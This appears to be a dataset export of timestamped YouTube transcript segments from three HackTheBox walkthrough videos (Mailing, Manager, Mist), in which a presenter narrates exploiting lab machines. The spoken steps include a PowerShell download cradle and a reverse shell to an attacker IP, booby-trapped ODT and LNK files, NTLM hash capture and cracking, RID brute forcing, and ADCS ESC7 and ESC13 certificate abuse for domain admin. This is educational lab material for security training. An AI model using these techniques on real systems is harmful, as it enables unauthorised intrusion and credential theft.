text
stringlengths
4
952
start
float64
0
9.37k
duration
float64
0
0
meta
dict
z uh capital I let's see is SMB poisoning on one that's the main thing we want server htps wpad SMB is on so that should be good uh let's see so we can do Python 3 this cve and then what are the arguments I'm sure if we do dasel it would tell us but we need server uh Port username password so let's do -- server mailing...
1,224.159
0
{ "video_id": "hHBkx31XuDw", "title": "HackTheBox - Mailing", "url": "https://www.youtube.com/watch?v=hHBkx31XuDw" }
htb Port 587 username administrator at mailing.
1,262
0
{ "video_id": "hHBkx31XuDw", "title": "HackTheBox - Mailing", "url": "https://www.youtube.com/watch?v=hHBkx31XuDw" }
HTP password should go back up to swwa it's the home networking administrator home net and then copy this net okay what else do we need sender uh administrator at mailing htb recipient did I spell that right I did and we're actually going to use um let's do Maya because this is the one that was in the PDF so there we g...
1,274.679
0
{ "video_id": "hHBkx31XuDw", "title": "HackTheBox - Mailing", "url": "https://www.youtube.com/watch?v=hHBkx31XuDw" }
so we'll come back when this sleep is done and the Sleep server we also have a ntlm V2 hash so I'm going to copy this and then we're going to attempt to crack it so let's go and SSH to the Kraken which is just a box of my local network um you can use your host operating system to run hashcat I just wouldn't run hashcat...
1,366.32
0
{ "video_id": "hHBkx31XuDw", "title": "HackTheBox - Mailing", "url": "https://www.youtube.com/watch?v=hHBkx31XuDw" }
then D Dash show and we see let's see the password is uh Maya NGS for ouri so let's try this credential with nxe so let's go back to nxc SMB and then I'm going to specify um Maya or is it Maya maybe haven't been saying the name wrong the whole time but we can try logging in and meanwhile we can close off the impacket s...
1,423.919
0
{ "video_id": "hHBkx31XuDw", "title": "HackTheBox - Mailing", "url": "https://www.youtube.com/watch?v=hHBkx31XuDw" }
10 10 1114 important and then a backs slash so we can do the space documents and then we want to put the password let's just copy and paste this so I can copy paste and then do a dir and it shows there are no files here so it doesn't look like we can really do much with SMB there are other options for net exec right so...
1,487.24
0
{ "video_id": "hHBkx31XuDw", "title": "HackTheBox - Mailing", "url": "https://www.youtube.com/watch?v=hHBkx31XuDw" }
Powershell so if we go into this folder I'm going to do GCI Force cuz this is going to show like hidden items if there are any hidden documents we don't see anything we could run wipas and stuff to look at like what types of things are on the box another thing is we could try like writing in the web directory route bec...
1,552.799
0
{ "video_id": "hHBkx31XuDw", "title": "HackTheBox - Mailing", "url": "https://www.youtube.com/watch?v=hHBkx31XuDw" }
um let's see there was a directory this downloaded from right so we could try writing into the directory uh let's see download PHP let's just download the script again and let's do uh instructions so if we go CD instructions we can't get in because it doesn't exist so I guess we just don't have any permissions in this ...
1,620.2
0
{ "video_id": "hHBkx31XuDw", "title": "HackTheBox - Mailing", "url": "https://www.youtube.com/watch?v=hHBkx31XuDw" }
this is and that breaks our UNCC path so that's why we can't use uh the file disclosure to leak the ntlm credentials of the web server so that's all I'm not getting us anywhere so the next thing I look at is like what's installed on the server right so if we do program one this is going to get us in program files and I...
1,686.36
0
{ "video_id": "hHBkx31XuDw", "title": "HackTheBox - Mailing", "url": "https://www.youtube.com/watch?v=hHBkx31XuDw" }
741 so if we Google this so if we go um let's see open Office 741 exploit and search Google there is a cve here and then some um information about it I think that's the same thing and this is going to create a um malicious open Office document so let's go ahead and clone this repository so I'm going to do a get clone a...
1,763.12
0
{ "video_id": "hHBkx31XuDw", "title": "HackTheBox - Mailing", "url": "https://www.youtube.com/watch?v=hHBkx31XuDw" }
newobject net. webclient download string and then HTTP 101048 I always put my web server in Port 8,000 and we'll do shell. PS1 you don't need to do the web cradle but whenever doing reverse shells I always like doing it because it tells me if antivirus is flagging it because antivirus isn't going to flag this right it'...
1,854.48
0
{ "video_id": "hHBkx31XuDw", "title": "HackTheBox - Mailing", "url": "https://www.youtube.com/watch?v=hHBkx31XuDw" }
endian format if we got rid of the I convert it's just as you expect right so that's all we do this puts it in a friendly format for Windows so we can run this and then the next thing to do is we have to get a reverse shell right so we can do powers shell like that okay and then let's see um we can go in dubdub dub and...
1,920.48
0
{ "video_id": "hHBkx31XuDw", "title": "HackTheBox - Mailing", "url": "https://www.youtube.com/watch?v=hHBkx31XuDw" }
PS1 to shell. PS1 and then let's put a shell here so we can do TCP client 10 10 148 901 save that okay so let's go ahead and create the exploit I'm going to move exploit ODT into the dubdub duub directory we created and then we're going to stand up a web server and then we can stand up our netcat listener and then let'...
1,958.559
0
{ "video_id": "hHBkx31XuDw", "title": "HackTheBox - Mailing", "url": "https://www.youtube.com/watch?v=hHBkx31XuDw" }
ODT exploit. ODT and let's put HTTP ahead okay so we have downloaded the document and then if someone opens this document with open Office it will then reach back to us download shell. PS1 and then hopefully execute that inow shell so that is what we are waiting on right now and whenever I wait for a task I always like...
2,013.72
0
{ "video_id": "hHBkx31XuDw", "title": "HackTheBox - Mailing", "url": "https://www.youtube.com/watch?v=hHBkx31XuDw" }
PS1 and a connection here if I hit enter and do who am I we see mailing local admin so if we go into users and then um let's see local admin desktop we can get root. text and that's pretty much the box so hope you guys enjoyed it take care and I will see you all next time
2,051.44
0
{ "video_id": "hHBkx31XuDw", "title": "HackTheBox - Mailing", "url": "https://www.youtube.com/watch?v=hHBkx31XuDw" }
what's going on YouTube this is ipag doing manager from hack the box which features another adcs attack which is the active directory certificate Authority server specifically the esc7 attack where you have the ability to manage the CA and certificates on the server but before you can get to that you have to find a use...
0.24
0
{ "video_id": "lT2Tv0m4k7M", "title": "HackTheBox - Manager", "url": "https://www.youtube.com/watch?v=lT2Tv0m4k7M" }
that to gain access into the server you'll get another credential and then you can do this um esc7 attack so let's just jump in as always we're going to start off with the end map so- SCC for default scripts SV enumerate versions OA output all formats put in the end map director and call it manager then the IP address ...
51.64
0
{ "video_id": "lT2Tv0m4k7M", "title": "HackTheBox - Manager", "url": "https://www.youtube.com/watch?v=lT2Tv0m4k7M" }
so let's go pseudo V ety host and then we can say 101 11236 manager dco1 uh whoops I don't know what mode I just went in dot that I think I hit caps lock there we go so we added that let's go take a look at everything that we could interact with um we have 80 HTTP so this is just the website that's probably going to be...
105.64
0
{ "video_id": "lT2Tv0m4k7M", "title": "HackTheBox - Manager", "url": "https://www.youtube.com/watch?v=lT2Tv0m4k7M" }
roasting we have to um like get authentication we can't just go and grab that SPN as an on authenticated user most likely so let's just keep going down till we find a cred and just keep that in our back pocket uh there is a clock skew so our date is off from the main controller that's not really interesting now but whe...
172.36
0
{ "video_id": "lT2Tv0m4k7M", "title": "HackTheBox - Manager", "url": "https://www.youtube.com/watch?v=lT2Tv0m4k7M" }
bottom of the page uh this is a testimonial from a user all these links are pointing back to itself as well if I click on about we've seen that service so nothing interesting here we can check for like Vost so if I do manager. htb uh we get the same exact site so at this point I probably should set up gobster to enumer...
229.76
0
{ "video_id": "lT2Tv0m4k7M", "title": "HackTheBox - Manager", "url": "https://www.youtube.com/watch?v=lT2Tv0m4k7M" }
SMB client - capital l 101014 oh that's my IP 1010 11.2 36 and then see the shares and there's no unique shares to this box at least from an unauthenticated standpoint so there's nothing we can do there and I think the next step a lot of people did was they went with the Brute Force step which you can do through a tool...
280.72
0
{ "video_id": "lT2Tv0m4k7M", "title": "HackTheBox - Manager", "url": "https://www.youtube.com/watch?v=lT2Tv0m4k7M" }
curro pre-authentication so with net exec if you want to do this we can say net exec um SMB cuz because there's no like Cerros option but we can use SMB and then specify Cerros so that way we authenticate to Cerros and then access SMB and then we got to specify a username we want let's do Ryan and then just a blank pas...
351.039
0
{ "video_id": "lT2Tv0m4k7M", "title": "HackTheBox - Manager", "url": "https://www.youtube.com/watch?v=lT2Tv0m4k7M" }
skew error right but if we fix time we'll get the principal unknown and while I say that I think krbtgt is also a disabled account does it have a dollar in it I can't remember let's see principal unknown let's try this uh client revoked so I don't know exactly um what the status of the guest account is because I think ...
415.639
0
{ "video_id": "lT2Tv0m4k7M", "title": "HackTheBox - Manager", "url": "https://www.youtube.com/watch?v=lT2Tv0m4k7M" }
blank so we actually succeeded authentication there um we could try guest blank password without Kos and then doing D- users do we have enough privileges as the guest to query the domain for all the users no we do not so even though we authenticated guest is just a really odd Windows account um I swear I was expecting ...
486.879
0
{ "video_id": "lT2Tv0m4k7M", "title": "HackTheBox - Manager", "url": "https://www.youtube.com/watch?v=lT2Tv0m4k7M" }
default all the way to the pre-authentication stuff with curos because it's new and sexy a lot of people don't log it so people don't like the default logging of windows it's hard to tell that you're doing it but really it depends on the word list so it's not great a long time ago um if you went to ic. ro go to the hei...
561.959
0
{ "video_id": "lT2Tv0m4k7M", "title": "HackTheBox - Manager", "url": "https://www.youtube.com/watch?v=lT2Tv0m4k7M" }
capital u guest for the username enter we can log in if you don't want that how this tool um does passwords is it's percent so this will try to log in with the ASD password which doesn't work you just put nothing there and boom you in so you can look at all the commands you don't have privilege to use all of these but ...
629.32
0
{ "video_id": "lT2Tv0m4k7M", "title": "HackTheBox - Manager", "url": "https://www.youtube.com/watch?v=lT2Tv0m4k7M" }
htb satisfied but for do look up names and then specify the name we want let's go with administrator because that's always a default account we get it Sid right and I don't know all these parts I think this just means as a sid this is the revision which all active active directory does I think this is the domain Sid an...
656.519
0
{ "video_id": "lT2Tv0m4k7M", "title": "HackTheBox - Manager", "url": "https://www.youtube.com/watch?v=lT2Tv0m4k7M" }
dollar um so let's go look up a said 10001 unknown 1,2 13 and this is all the brute forcing is doing is it's going here and the default was I think 4,000 um we can do all ones I think it's 1113 as a user there we go manager is on and now we have a valid user right so if we go up to this we can see let's go to a group u...
721.48
0
{ "video_id": "lT2Tv0m4k7M", "title": "HackTheBox - Manager", "url": "https://www.youtube.com/watch?v=lT2Tv0m4k7M" }
an argument so we'd add like 6,000 there if we had um IDs in the 4000s so let's move on I'm going to do output. text we could have probably saved this crack map exec in a better format but I like just grapping through it right so I can just gra this so let's say I want all users out of it then let's go with a print uh ...
791.56
0
{ "video_id": "lT2Tv0m4k7M", "title": "HackTheBox - Manager", "url": "https://www.youtube.com/watch?v=lT2Tv0m4k7M" }
step is um root forcing the password and it's a common password of the username is also going to be the password I don't love the step it is a little bit guy but it is something that I've seen plenty of times in the real world um it sucks when it happens because it takes so long to find but you live and learn I guess r...
866.04
0
{ "video_id": "lT2Tv0m4k7M", "title": "HackTheBox - Manager", "url": "https://www.youtube.com/watch?v=lT2Tv0m4k7M" }
account or not let's just add D- continue on success so this way when we get a success it's still going to keep on going guest guest Operator Operator login failure and I think issue is casing so we would have to make this a lower case and now I don't exactly love this step uh let's see there should be a way we can jus...
934.44
0
{ "video_id": "lT2Tv0m4k7M", "title": "HackTheBox - Manager", "url": "https://www.youtube.com/watch?v=lT2Tv0m4k7M" }
dco1 so let's do uh let's see it's not crack map net exec SMB dasu let's try domain DP domain and then is it D- shares to list shares we need 10 10 11 236 and access denied then we can try like the next one Operator Operator I think and this one we have access um it doesn't look like we have access to anything special ...
1,030.48
0
{ "video_id": "lT2Tv0m4k7M", "title": "HackTheBox - Manager", "url": "https://www.youtube.com/watch?v=lT2Tv0m4k7M" }
and try to log in as that is a weird one that succeeds I don't know so we have successful authentication there's no extra shares available to us uh but we did see mssql right so let's try that uh we probably have to get rid of that shares so we can just do eight uh oh I guess we're in SMB mode so it only works with SMB...
1,134.6
0
{ "video_id": "lT2Tv0m4k7M", "title": "HackTheBox - Manager", "url": "https://www.youtube.com/watch?v=lT2Tv0m4k7M" }
at uh 10 10 11 236 and that did not work do we say manager.
1,227.64
0
{ "video_id": "lT2Tv0m4k7M", "title": "HackTheBox - Manager", "url": "https://www.youtube.com/watch?v=lT2Tv0m4k7M" }
HTP did I misspell operator let's just copy and paste it let's see we're doing something wrong with this you did Target let's look at the help again oh we can use Windows off and there we go now we get access to mssql we can help to see things we could do um let's try XP CMD shell who am I permission denied let's try e...
1,243.96
0
{ "video_id": "lT2Tv0m4k7M", "title": "HackTheBox - Manager", "url": "https://www.youtube.com/watch?v=lT2Tv0m4k7M" }
dirry and this one doesn't normally require like Advanced privileges to run so we can say XP dirry C colon and now we can read files off the web server uh there is inet Pub so we can go there then dubdub dub root and we see in dubdub duub root there is a website back up so let's go ahead and download this so if we just...
1,357.24
0
{ "video_id": "lT2Tv0m4k7M", "title": "HackTheBox - Manager", "url": "https://www.youtube.com/watch?v=lT2Tv0m4k7M" }
and then say um SMB 1010 11236 U Raven DP copy this password and we can log in we can also do the shares to see if there's any new shares that pop up I don't think there will be normally you don't really see hidden shares that pop up from a user you normally just see you can't access them but we can try other methods o...
1,446
0
{ "video_id": "lT2Tv0m4k7M", "title": "HackTheBox - Manager", "url": "https://www.youtube.com/watch?v=lT2Tv0m4k7M" }
get root there right because we do that we normally have the SC impersonate privilege and from there you would just use like um one of the potatoes to prives so so let's see we can win RM but there is another thing we could check and we could try like some type of adcs attack this the Box name is manager so it kind of ...
1,547.48
0
{ "video_id": "lT2Tv0m4k7M", "title": "HackTheBox - Manager", "url": "https://www.youtube.com/watch?v=lT2Tv0m4k7M" }
1010 11236 and then we do standard out and Frable hope can typ uh just one dash there we go so this is going to search for any vulnerable certificate and we see the um Raven has dangerous permission that enables ESC 7 so if we Googled like Hax esc7 we'd come to a guide that tells us pretty much how to do it I believe l...
1,620
0
{ "video_id": "lT2Tv0m4k7M", "title": "HackTheBox - Manager", "url": "https://www.youtube.com/watch?v=lT2Tv0m4k7M" }
manager dc1 CA and then add officer Raven and you get that CA name it's probably in the standard out right yep right here manager dco1 CA so we add the officer Raven and that's going to allow us to manage uh CA and since we can manage CA now we can enable a template so we could say- enable template subc and if you want...
1,782.679
0
{ "video_id": "lT2Tv0m4k7M", "title": "HackTheBox - Manager", "url": "https://www.youtube.com/watch?v=lT2Tv0m4k7M" }
which is going to be the username is going to be set to administrator it'll probably be Raven's ticket but since the UPN set to administrator that's what it uses to log on and unknown argument uh let's see we have to do make this a request so we're going to request it we'll save the private key and we got an error deni...
1,870.88
0
{ "video_id": "lT2Tv0m4k7M", "title": "HackTheBox - Manager", "url": "https://www.youtube.com/watch?v=lT2Tv0m4k7M" }
say retrieve 13 and now we have administrator. pfx and this certificate has the principal name of administrator at manager. htb so if we use this we will just magically authenticate certify off then the pfx and file name so it's going to reach out to domain get a TGT save the um log into the ccache that's the credentia...
1,954.36
0
{ "video_id": "lT2Tv0m4k7M", "title": "HackTheBox - Manager", "url": "https://www.youtube.com/watch?v=lT2Tv0m4k7M" }
here it came in before like the whole built but we can see system there if you wanted to um evil winrm would also work and that'll stay as administrator so we could say evil wi RM I 101 11236 Das Capital H for hash and then you administrator I'm not sure I think we just give it ntlm we don't have to do the lmh colon nt...
2,035.799
0
{ "video_id": "lT2Tv0m4k7M", "title": "HackTheBox - Manager", "url": "https://www.youtube.com/watch?v=lT2Tv0m4k7M" }
what's going on YouTube this is ipag we're doing mist from hack the box which was an absolute Beast of a machine my favorite part about this box is definitely the ntlm relay which is part of the foothold and it's made more difficult because domain users can't add machines or DNS entries to The Domain so it starts off w...
0.04
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
yet again to get the ntlm hash of the machine which then through cerus will let us impersonate the administrator user to gain admin on that client but that's not it that's only for the user in order to get root there's a few things we have to do but the key one is the adcs ESC 13 attack which allows us to add specific ...
43.84
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
the banner tells us it's an Apache web server running on Windows which is a little bit odd and has PHP enabled and also if you have a Keen Eye we have a TTL of 126 the default TTL on Windows is 128 and it decrements by one every hop so most of the time when we come across a Windows box we see a TTL of 127 this just mea...
94.439
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
may be a data directory and a docs directory then we have the HTTP generator telling that it's running pluck version 4.78 the title of the page and it's requesting um when we navigate to 10101 11.17 it directs us to file is equal to missed there's also a PHP session cookie so we know this is a PHP web server so let's j...
145
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
when this version was released let's go back to the end map and see if we can find out the release date so we can just search for like pluck 4718 release and see when this was um we have cve this is an rce that's interesting let's see I wonder if we add GitHub if this will have any type of release there we go releases ...
203.64
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
like it is probably a file disclosure we can extract sensitive information um the next one here is I'm surprised this is a cve it's saying it doesn't requ restrict login attempts after a lot of failed ones so it's vulnerable to Brute Force probably not something in a hack the Box machine uh we have a file upload vulner...
268.36
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
so uh let's see the next one is cross site scripting and then let's see VI the manage file and it looks like we're talking about version 4717 or 4715 so we're no longer in what we're vulnerable to so it's going to be one of these four cves I'm going to start with the file disclosure we probably should um try this if I ...
332.479
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
it can't be displayed because it contains an error that's probably because the header is telling us it's an image and it doesn't have an image so the browser is not responding or not displaying it we can check that out with like c-i to only show the headers DV this page and let's see we probably don't need- V when we d...
389.72
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
expression on looking for like um directory traversal cuz this like dot dot or um and it's doing a bunch of other things so that's probably like directory traversal command injection things like that and it's checking it on um looks like a few parameters and then if no hacking attempts are found it will include the set...
443.44
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
miss. PHP so if we just do um I think it's just image is equal to miss. PHP we get the contents of that but obviously we want to get admin backup so let's go ahead and try downloading that and looks like we get a hash uh let's do Echo DN paste this in wc- C 128 I'm going to guess this is a sha 512 hash um if we Echo te...
504.039
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
bridges maybe yes awesome I'm not a robot uh it looks like it cracks to lexip poo 997 so what we have to do now is figure out how to log in or use this password on uh pluck now we could like go Buster and guess this right but pluck is open source so whenever there's an open source application I do like going and just l...
577.48
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
let's see we have to get code execution now we could do it through um whatever that cve was that I found before the exploit script but if we just go to manage modules most ms's It's relatively trivial to get code execution when they support things like plugins or themes and things like that they can just write PHP code...
646.279
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
move shell. PHP into shell and then let's just zip this up so zip-r shell. zip okay then upload it and it says the module has been installed successfully and then directs us to manage modules um I'm going to go HTTP 101 117 was it data modules right and we don't have shell did it not install install module let's try th...
719.68
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
Port 90001 and then before I start a web server uh whenever I do poers shell reverse shells I always like creating some type of web cradle because um I'm going to have it Go and download I could just like give it raw Bas 64 and execute the shell straight away but normally I don't get error messages when I do this so if...
820.32
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
web client download string HTTP 10148 Port 8000 rev. PS1 there we go I going do I convert C cradle I convert UTF 16 little Indian base 64 W because um Powershell just likes things encoded this way uh let's do Python 3 HTTP server then we can do RL RP NC lvmp 901 and we can do Powershell DC for encoded command and run i...
857.88
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
stream um oh God not that there we go let's see the next one is byes we'll do that to Dollar B then let's see the next variable data dollar D next one is send back we'll just do SB then I want to say there's send bite next so send bite uh we probably need this as a dollar we'll call this s SP okay I think I've renamed ...
935.72
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
user so I really don't like the um guessing I'm about to do here but I don't know a good way to Showcase like what we're supposed to do but if we look at the slash directory we have a common applications so I do CD common appliations let's make sure we're in it uh CD common star it's a pain to escape that space there w...
1,016.92
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
so we'll do ired team um malicious shortcut go to Google let's see this post is the one I normally use and let's see you do command start process I just need is this what I normally use I think so so we'll do um object shell is equal to new object comob wscript do shell then we can create the link so that's going to be...
1,083.88
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
lnk okay then we're going to set the target path is equal to does this have Powershell it does awesome okay then we can do lnk do arguments is equal to they have a few good ones here so let's just add these and then encoded command let's go back here or I convert command grab the Bas 64 and this is why having the web c...
1,147.52
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
should happen within I think like 2 minutes so if we look at the time now it is 52546 so either in 10 seconds or probably a minute 10 seconds we should get it so I'm just going to do a sleep 120 just so I know when 2 minutes has happened and I'm going to probably pause the video now and then if the Sleep finishes we kn...
1,229.679
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
is get the host name of this box so well the host name is going to be ms01 um we could just run host name so let's now edit our host file and we're going to start putting these host here so this was 100101 it is ms01 and then we need to get the domain so I'm going to try pinging um 192 168 100 100 does this come back w...
1,293.919
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
get the domain controller's name um I'm going to stand up chisel at this point so let us do another link. saave because I have a feeling we're going to need to get a few shells here so I'm going to do RL RP n cvnp 901 and I'm going to name this one tunnels So eventually we'll get a hit there so we have to upload chisel...
1,386.919
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
here and we already already downloaded it so I'm going to do chisel EXE client then 10 10 148 Port 81 R colon sucks and we should get that call back so now we can run net exact so I'm going to do nxc um we have to proxy chains it then SMB 192 168 100 100 so we can get back to enumerating this way right right and we can...
1,491.559
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
zero is it responder Pi maybe respond to lowercase there we go so I can just do like a GCI on 10 10148 um share file. text doesn't have to exist it's just going to make a connection back over to my server and then uh give us the hash right so here we can do a pseudo V not v s the Kraken which is just a box on my networ...
1,579.88
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
through the tunnel and number two we don't know the user's credentials right so um if we just run Shar pound from this user we can get all the data we want if we wanted to run the Bloodhound dopy locally we need to know the user credentials to authenticate right so having the exe just lets us skip having to know creden...
1,655.559
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
exe sharp hound. exe save that and then if we try to execute it let's just make sure it works it's taking a while looks like it is um yep it looks like Shar pound is working just fine so I'm going to do a what is it like- C all this will do a collection for everything and then we need to get the data back to us so let'...
1,718.48
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
as long as a user has permission which they do to drop it uh internal server era still okay so let's not copy the files um let's do di HD docs uh can we just copy to HD docs we can there we go and then we'll save it to htb missed okay so now we have to run blood hound and I'm going to run the community version of Blood...
1,824.2
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
this okay and my computer is running a a really odd version of Docker where I don't have Docker space compose I have to do Docker Dash compose but yours most likely is Docker space compose um so we're going to pull this it's probably going to take I don't know um 5 minutes to start Blood Hound so I'm going to pause the...
1,914.36
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
we'll do password 2024 Bang it needs to be a capital P probably because we need one Capital there we go and once we log in we should be able to change the dark mode setting here to turn dark mode on and I can turn it off here so they don't conflict and now we have to go to file ingest and upload our file so let's go in...
1,974.039
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
change that to false I don't know exactly what this does it could be a horrible advice but it makes blood hound look pretty again so if you want it to look pretty I would definitely recommend that so now we have this Brandon keyw warp user and we can can look at all the data blond Hound tells us about them if we go to ...
2,051.399
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
to go back to my session let's see PWD I'm in program data so I'm going to copy let's see if I go dubdub dub we can copy opt is it sharp collection then we'll do NET Framework 47 any and then we want certify so we'll copy that to this directory and we can do a curl HTTP 1010 148 P 8,000 certify and call it certify exe ...
2,123.56
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
reverse shells I used and it's just an excluded directory and you can't really enumerate that as a low privilege user to my knowledge you have to be an administrator but um a lot of times like uh database directories um web server sometimes they're just excluded from Defender so we're going to skip a bunch of AV evasio...
2,198
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
is going to be a tool I'm not going to actually run it but talk about how it works at the end I just want to focus again on the event logs because I love when attackers start getting information from event logs because I just love event logs um if you want tips on how to search event logs go watch my Sherlocks videos l...
2,244.44
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
administrative privileges there we go must be administrator to view exclusions well okay we can just go to the event log now so I'm going to do the poers shell command get win event and do log name and the log name where Defender writes is Windows Windows Fender than um operational and if we just get this log it's goin...
2,288.839
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
message and then a format list will prevent it from truncating how it has those like dot dot dots and we can see a lot of data here right so if we just search this list with for exclusion uh we can see TP exclusions we also see this one um old value is nothing new value H key local machine software Microsoft Windows De...
2,361.52
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
so I find this really cool um the event logs are definitely useful for attackers I know like a lot of the top teams used to be pillaging the event logs because like commands like pow shell commands that were ran were sometimes included in the event log so that could give indications on um like how boxes were built that...
2,430.88
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
however if the folder the pipe is in is excluded it never attempts to read the pipe so um in this example if folder to check was excluded it would not proceed to read this so the command would never error out however if it's not excluded it then reads this and says hey this is bad right and we can see the error message...
2,488.04
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
um oh I guess we could write to the root of the web server as well but I'm going in files just because um opsac reasons I don't want to like leak a bunch of files just on the web route for other people to go download them right but we could do that if we put it in the um directory where like the modules is where we did...
2,553
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
lowercase CI okay and then this will tell us how to use this ticket so it may take probably 30 seconds I guess to run and hopefully it runs successfully there we go we have the certificate here going to copy it on my clipboard and then we're going to use the command it recommends to um convert it into a pfx so let's no...
2,621
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
a curl HTP 10 10 14 8 8,000 Randon keyw war. pfx Das Randon keyw pfx that was a 200 so we did save that and we want to get rubius over to This Server because the next step is going to be using rubius to perform that past the ticket attack to get the ntlm hash of Brandon and then that will just allow us to use tools thr...
2,717.96
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
if just not good content so this is a really nice Saving Grace okay we have rubius so rubius we can do a ask for the ticket gring ticket user Brandon key warp uh the certificate is going to be in C colon we probably don't have to do the full path um let's just try Brandon keyw war.
2,786.72
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
pfx then get credentials show no W let's see you must apply a I did do certificate is a certificate colon it is so let's see if we can actually read that certificate if it can't then we need to put the full path there but I'm guessing it'll work off current working directory so this one there we go we have ntlm hash of...
2,815.559
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
command uh let's see we want to use ldap not SMB and we can specify maq this is going to tell us our machine is set to zero so we can't add domains to the domain controller and since we oh we can't add like computers um wait what why did that fail that's probably got to be do 100 because ldap is definitely not running ...
2,894.4
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
do um things the other thing is if we want to relay connections we can can potentially like create a DNS entry and point it back to us and normally domain users have that permission but we're going to try that really quick and find out we do not have that permission so where is uh dubdub dub I'm going to download a too...
2,962.079
0
{ "video_id": "5osU3Igzv_Y", "title": "HackTheBox - Mist", "url": "https://www.youtube.com/watch?v=5osU3Igzv_Y" }
